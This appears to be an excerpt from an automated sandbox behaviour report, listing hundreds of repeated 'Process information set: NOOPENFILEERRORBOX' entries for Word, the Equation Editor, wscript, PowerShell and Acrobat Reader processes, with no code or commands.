Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
